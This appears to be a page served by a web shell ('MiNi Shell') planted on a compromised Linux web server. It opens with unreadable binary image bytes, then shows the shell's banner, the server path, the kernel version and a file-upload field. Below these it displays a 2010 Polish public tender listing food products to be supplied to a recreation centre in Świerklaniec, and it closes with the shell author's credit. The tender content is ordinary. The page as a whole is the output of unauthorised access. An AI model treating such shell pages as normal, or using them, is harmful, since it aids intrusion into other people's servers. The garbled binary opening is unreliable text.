JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/385328-N-2010.html

<p class="kh_header"><b>Świerklaniec: Sukcesywna dostawa artykułów spożywczych dla Gminnego Ośrodka Rekreacji</b><br>
<b>Numer ogłoszenia: 385328 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Rekreacji , ul. Parkowa 30, 42-622 Świerklaniec, woj. śląskie, tel. 032 2844330, faks 032 2844490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.palackawalera.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.palackawalera.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowy zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów spożywczych dla Gminnego Ośrodka Rekreacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  dostawa:
-	mleka i przetworów mlecznych ( CPV 15511000-3 )
-	warzyw i owoców mrożonych ( CPV 15300000-0, 15331170-9 )
-	 (CPV 15311200-3) ziemniaki, krojone lub w plastrach oraz pozostałe ziemniaki mrożone
-	wyrobów cukierniczych o przedłużonej trwałości, przypraw, herbaty, kasz, przetworów zbożowych, soków  (CPV 15842000-2 )
-	tłuszczy ( CPV 15411200-4) 
-	ryb (CPV15222000-0)
w asortymencie i ilości określonych w formularzu cenowym, który stanowi załącznik nr 2 do SIWZ.
Zamawiający zastrzega sobie możliwość niewykorzystania zamówionych ilości. Zamawiający zastrzega sobie możliwość odstąpienia od realizacji zamówienia w momencie zaistnienia sytuacji, której nie mógł wcześniej przewidzieć i wykonanie zamówienia nie należałoby w interesie Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, których wartość nie przekroczy 20% wartości zamówienia podstawowego na zasadach określonych w art. 67 ust. 1 pkt 7 ustawy. Rozdział 6. I</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.51.10.00-3, 15.30.00.00-0, 15.21.12.00-3, 15.84.20.00-2, 15.41.12.00-4, 15.22.20.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Decyzję właściwego organu Państwowej Inspekcji Sanitarnej, a w odniesieniu do uprawnień, o których mowa w art. 40 ust. 5 ustawy z dnia 11 maja 2001 r o warunkach zdrowotnych żywności i żywienia -organu Inspekcji Weterynaryjnej, potwierdzającej spełnienie wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie artykułami będącymi przedmiotem zamówienia oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów     ( Podstawa: art.27 ust 1 i 2 ustawy, Dz. U. 2005, Nr 31,poz. 265 z późn. zm.)
2.Dokument potwierdzający spełnianie warunków sanitarnych przez środek transportu, jakim przewożona będzie żywność z uwzględnieniem jego marki i nr rejestracyjnego zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19.12.2002 r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności ( Dz. U.  z 2003 r., Nr 21, poz. 179).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.palackawalera.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Rekreacji w Świerklańcu
ul. Parkowa 30
42-622 Świerklaniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2010 godzina 08:00, miejsce: Gminny Ośrodek Rekreacji w Świerklańcu
ul. Parkowa 30
42-622 Świerklaniec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pakiet nr 1 - dostawa mleka i przetworów mlecznych 
( CPV 15511000-3 ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Masło osełkowe 300g lub równoważne-15530000-2-szt.-1200
2-Masełka jednorazowe  1szt.- 10g-15530000-2-szt.-3500
3-Mleko 3,2% opak. 1 litr -15511000-3-szt.-1500
4-Kefir - opak. 0,4kg -15551000-5-szt.-30
5-Mleko zagęszczone niesłodzone 375ml-15512100-1-szt.-1000
6-Serki jednorazowe tartare opak. - 6szt x20g lub równoważne-15542000-9-op.-200
7-Rama Cremefine do gotowania Knorr 15% -1 l lub równoważne-15431110-2-szt.-100
8-Rama Cremefine do ubijania Knorr 33% - 1 L lub równoważne-15431110-2-szt.-200
9-Serek biały  Bieluch- opak. 150g-15542100-0-szt.-100
10-Jogurt naturalny - opak.  0,4kg-15551310-1-szt.-50
11-Ser topiony krążek 200g -15542200-1-szt.-110
12-Ser żółty blok np. gouda twardy-15544000-3-kg-200
13-Sery miękkie pleśniowe. Camembert lub równoważne szt.-120g różne smaki-15542000-9-szt.-300
14-Ser Feta 18% 1opak. - 250-300g-15542300-2-szt.-150
15-Ser oscypek opak. -0,5kg-15542300-szt.-100
16-Ser żółty wiórki mozarella-15544000-3-kg-600
17-Ser Mozarella w zalewie 
szt. -125g lub równoważne-15542000-9-szt.-450
18-Bita śmietana w aerozolu -15512900-9-litr-400
19-Drożdże kg-15898000-9-kg-10
20-Ser pleśniowy Rokpol-15543100-7-kg-10
21-Rama combi profi. 3,7litra Knorr lub równoważne-15431110-2-szt.-7
22-Nutella krem pakowany jednorazowo 1szt. - 20g lub równoważny-15842200-4-szt.-1000
23-Jogurt owocowy opak.130- 150g*-15551300-8-szt.-1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pakiet nr 2 -dostawa warzyw i owoców mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Brokuły, paczka 2,5kg  np. Oerlemans lub równoważne-15331170-9-szt.-70
2-Mieszanka chińska, paczka 1kg np. Oerlemans lub równoważne-15331170-9-szt.-10
3-Bukiet warzyw, paczka 2,5kg   np. Oerlemans lub równoważne-15331170-9-szt.-100
4-Szpinak siekany kulki,  paczka 2,5kg  np. Oerlemans lub równoważne-15331170-9-szt.-15
5-Grzyby kurki mrożone całe, paczka 2,5kg : np. Oerlemans lub równoważne -15331170-9-szt.-35
6-Grzyby borowik kostka, paczka 2,5kg  np. Oerlemans lub równoważne-15331170-9-szt.-50
7-Pieczarki mrożone plastry 2,5kg  np. Oerlemans lub równoważne-15331170-9-szt.-10
8 -Szpinak liście, paczka 2,5kg np. Oerlemans lub równoważne-15331170- 9-szt.-10
9-Szparagi całe białe  np. Oerlemans lub równoważne-15331170- 9-kg-40
10-Szparagi całe zielone np. Oerlemans lub równoważne-15331170- 9-kg-40
11-Groszek zielony np. Oerlemans lub równoważne-15331170-9-kg-10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-0, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pakiet nr 3 - ziemniaki, krojone lub w plastrach oraz pozostałe ziemniaki mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Frytki proste ekspress opak. 2,5 kg  np. McCain, lub równoważne-15311100-2-op.-400
2-Kuleczki ziemniaczane opak. 2,5kg  np. McCain lub równoważne-15311200-3-op.-50
3-Ćwiartki ziemniaczane ze skórą  opak. 2,5kg np. McCain  lub równoważne-15311200-3-op.-200
4-Szyszki opak. 1,5np. McCain lub równoważne-15311200-3-op.-50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.12.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pakiet nr 4 - dostawa -	wyrobów cukierniczych o przedłużonej trwałości, przypraw, herbaty, kasz, przetworów zbożowych, soków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Cukier opak. 1kg-15831000-4-kg-500
2-Mąka pszenna opak. 1kg-15612100-2-kg-1000
3-Mąka ziemniaczana np. Superior lub równoważne- opak. 1kg-15623000-1-kg-500
4-Makaron nitka opak.-0,25kg np. Goliar lub równoważne-15851100-9-szt.-300
5-Makaron Farfalle (kokardki)  opak. 5kg np. Hugli lub równoważne-15851100-9-szt.-15
6-Makaron Rogate (rurki)  opak. 5kg np. Hugli lub równoważne-15851100-9-szt.-15
7-Makaron Spaghetti  opak.5kg np. Hugli lub równoważne-15851190-6-szt.-10
8-Ryż długoziarnisty  op. 5kg  np. Hugli lub równoważne-15611000-4-szt.-30
9-Morela suszona op. -0,2kg * -15332410-1-szt.-20
10-Orzech włoski - opak. 1kg -01131000-4-kg-25
11-Śliwki suszone bez pestek - opak. 1kg -15332410-1-kg-50
12-Migdały płatki - opak. 1kg-15332100-5-kg-15
13-Rodzynki irańskie ciemne - opak. 1kg -15332412-5-kg-10
14-Sos czekoladowy 1L-15871260-4-szt.-120
15-Sos truskawkowy lub malinowy1L -15871260-4-szt.-20
16-Dżemy jednorazowe  1szt - 20g różne smaki-15332290-3-szt.-800
17-Miody naturalne jednorazowe  1szt -  20g różne smaki-15831600-8-szt.-500
18-Koncentrat pomidorowy hugli lub równoważne- opak. 1kg-15331425-2-kg-60
19-Ketchup np. tortex lub równoważne - opak. 5kg-15871230-5-Szt.-70
20-Majonez dekoracyjny np. knorr lub równoważne- opak. 3kg-15871273-8-Szt.-100
21-Musztarda sarepska opak. 3kg-15871250-1-Szt.-70
22-Barszcz czerwony koncentrat  opak. - 0,38l Krakus lub równoważne-15331000-7-szt.-100
23-Chrzan tarty - opak. 1kg-15871250-1-kg-100
24-Ocet spirytusowy 10% szt. - 0,5litra-15871110-8-szt.-200
25-Ogórek konserwowy 1 szt.-0,9litra  -15331400-1-szt.-250
26-Kapary hiszpańskie 1szt. - 0,72kg -15331000-7-szt.-20
27-Fasola czerwona 1 szt. - 0,425 litra -15331400-1-Szt.-30
28-Groszek konserwowy 1szt - 0,400 litra -15331462-3-szt.-60
29-Kukurydza konserwowa 1szt. - 0,425 L -15331460-9-szt.-300
30-Oliwki czarne drylowane 1 szt.-0,935 kg-15331450-6-szt.-20
31-Oliwki zielone drylowane z papryką  1 szt. - 0,92 kg -15331450-6-szt.-30
32-Papryka czerwona 1szt - 0,72 litra -15331136-9-szt.-200
33-Seler cięty 1 szt. 0,320 litra-15331400-1-Szt.-250
34-Żurawina do mięs 1 szt. - 0,314 litra -15332100-5-szt.-60
35-Brzoskwinie połówki 1szt. - 0,82kg-15332150-0-szt.-30
36-Ananas op. 565g--szt.-150
37-Zaprawa cytrynowa 1litr  -15890000-3-szt.-100
38-Pieczarki 1szt. - 0,8 litra -15331480-5-szt.-150
39-Buraczki wiórki 1szt - 370 ml -15331000-7-szt.-50
40-Przyprawa do drobiu np. knorr, lub równoważne - opak. 1kg-15870000-7-kg-15
41-Przyprawa do grilla np. knorr, lub równoważne opak. 1kg-15870000-7-kg-10
42-Przyprawa do ryb np. hugli lub równoważne opak. 1kg-15872200-3-kg-10
43-Przyprawa warzywna 1szt - 4,7kg np. hugli lub równoważne-15871270-7-szt.-25
44-Chilli  opak. 1kg-15872200-3-kg-2
45-Curry -15872200-3-kg-5
46-Czosnek granulowany np. hugli lub równoważne-15872200-3-kg-20
47-Kminek mielony -15872200-3-kg-4
48-Liście laurowe -15871000-4-kg-1
49-Majeranek -15872300-4-kg-3
50-Oregano -15872000-1-kg-2
51-Papryka ostra -15872000-1-kg-3
52-Papryka słodka np. hugli lub równoważne-15872000-1-kg-4
53-Pieprz czarny mielony  np. knorr, hugli lub równoważne-15872100-2-kg-20
54-Pieprz kolorowy np. knorr lub równoważne-15872200-3-kg-5
55-Pietruszka suszona np. hugli lub równoważne-15893100-5-kg-3
56-Przyprawa do potraw chińskich np. hugli lub równoważne-15872000-1-kg-3
57-Przyprawa do gyrosa np. knorr  lub równoważne-15872000-1-kg-3
58-Tymianek -15872300-4-kg-2
59-Żelatyna spożywcza np. hugli lub równoważne-15800000-6-kg-50
60-Ziele angielskie -15871000-4-kg-5
61-Koperek suszony np. hugli lub równoważne-15893100-5-kg-2
62-Zioła prowansalskie -15872000-kg-1
63 -Mieszanka owocowa 1szt. - 0,85kg-15332150-0-szt.-700
64-Marynata do mięsa wieprzowego  np. knorr, hugli lub równoważne-15872200-3-kg-5
65-Marynata do mięsa wołowego  np. hugli lub równoważne-15872200-3-kg-5
66-Pieprz w paście np. knorr lub równoważne-15312400-2-kg-3
67-Bazylia -15872200-3-kg-2
68-Szczypiorek np. hugli lub równoważne-15893100-5-kg-1
69-Sól jodowana-15872400-5-kg-100
70-Przyprawa w płynie cielęca np. knorr lub równoważne-15872200-3-L-20
71-Przyprawa w płynie wołowa np. knorr lub równoważne-15872200-3-L-20
72-Przyprawa w płynie z kury np. knorr lub równoważne-15872200-3-L-35
73-Sos grzybowy np. knorr lub równoważne-15871260-4-kg-30
74-Sos holenderski np. knorr lub równoważne-15871260-4-kg-15
75-Sos pieczeniowy  np. knorr lub równoważne-15871260-4-kg-10
76 -Sos pieprzowy np. knorr lub równoważne-15871260-4-kg-15
77-Sos Worcester np. hugli lub równoważne-15871260-4-L-20
78-Sos boloński  np. hugli lub równoważne-15871260-4-kg-10
79-Sos sałatkowy 1000 wysp np. knorr lub równoważne-15871260-4-kg-2
80-Sos sałatkowy ogrodowy np. knorr lub równoważne-15871260 -4-kg-30
81-Sos delikatny w paście np. hugli lub równoważne-15871260-4-kg-20
82-Sos biały kremowy np. hugli lub równoważne-15871260-4-kg-8
83-Sos słodko kwaśny np. hugli lub równoważne-15871260-4-kg-5
84-Grzanki ziołowo -czosnkowe np. knorr lub równoważne-15820000-2-kg-10
85-Groszek ptysiowy np. hugli lub równoważne-15820000-2-kg-25
86-Krem balsamiczny np. hugli lub równoważne 0,5l-15891000-0-szt.-10
87-Puree ziemniaczane -15310000-4-kg-5
88-Zupa brokułowa w proszku np. hugli lub równoważne-15891400-4-kg-20
89 -Zupa cebulowa w proszku np. hugli lub równoważne-15891400-4-kg-15
90-Zupa krem z borowików w proszku np. knorr lub równoważne-15891400-4-kg-100
91-Zupa porowa w proszku np. hugli lub równoważne-15891400-4-kg-10
92-Barszcz czerwony w proszku np. hugli lub równoważne-15891400-4-kg-80
93-Frytura olej palmowy -15411100-3-L-1200
94-Gruszka w syropie 1op. -820g -15332150-0-szt.-80
95-Galaretka owocowa 2kg - np. hugli lub równoważne-15332240-8-szt.-30
96-Pasta curry np. knorr, hugli  lub równoważne-15872200 -3-kg-5
97-Panierka Hugli np. hugli lub równoważne-15872200-3-kg-10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> pakiet nr 5 - ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1-Tuńczyk w sosie własnym op. 170g-15241400-3-szt.-80
2-Filet śledziowy a la Matyjas -15241200-1-kg-150
3-Pstrąg patroszony-15220000-6-kg-200
4-Sandacz filet ze skórą-15220000-6-kg-40
5-Łosoś steki-15220000-6-kg-40
6-Łosoś wędzony plastry 1szt. - 0,2kg  np.Marine -15234000-7-szt.-500
7-Mintaj filet-15220000-6-kg-150
8-Panga filet bez skóry-15220000-6-kg-50
9-Sola filet bez skóry -15220000-6-kg-70
10-Szyjki rakowe-15251000-2-kg-6
11-Mieszanka morska frutti di marre -15250000-5-kg-15
12-Krewetka BT 16-20 (podgotowane)-15250000-5-kg-50
13-Żabie udka-15119400-9-kg-30
14-Kawior czarny 1szt. - 50 g -15244100-1-szt.-50
15-Kawior czerwony 1 szt. - 50g-15244100-1-szt.-50
16-Dorsz filet bez skóry-15220000-6-kg-50
17-Pstrąg filet-15220000-6-kg-40
18-Okoń nilowy-15220000-6-kg-20
19-Przyprawa fond rybny-15871270-7-kg-8
20-Halibut steki-15220000-6-kg-100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com